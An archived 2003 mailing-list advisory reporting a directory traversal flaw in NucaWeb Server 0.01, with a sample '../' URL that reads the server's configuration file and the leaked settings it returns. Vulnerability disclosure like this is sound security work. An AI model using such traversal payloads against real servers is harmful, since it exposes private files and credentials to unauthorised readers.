Directory traversal in NucaWeb Server

From: Over_G (overgat_private)
Date: Tue Jun 10 2003 - 02:28:02 PDT

Next message: SGI Security Coordinator: "[Full-Disclosure] Potential Denial of Service using PIOCSWATCH ioctl on IRIX"

Previous message: Lars Eilebrecht: "Re: Apache 2.x APR Exploit Code"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Product: Nuca WebServer
Version: 0.01
OffSite: http://www.geocities.com/nucainterface
Problem: Directory traversal
------------------------------------------------

NucaWebServer - server, written in Delphi.
This server have a large problem - Atacker may view all files on hard disk.
The server does not process the entering data.


http://[victim]/../existing_file

Example:
http://[victim]/../webserver.ini
and you may be view webserver configuration.

[Configuration] SSL=0 Port=80 Root=D:\webservers\Nms\web Authentic=0 Username= Password= 



www.overg.com www.dwcgr0up.com
regards, Over G[DWC Gr0up]

Next message: SGI Security Coordinator: "[Full-Disclosure] Potential Denial of Service using PIOCSWATCH ioctl on IRIX"
Previous message: Lars Eilebrecht: "Re: Apache 2.x APR Exploit Code"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Jun 10 2003 - 08:48:24 PDT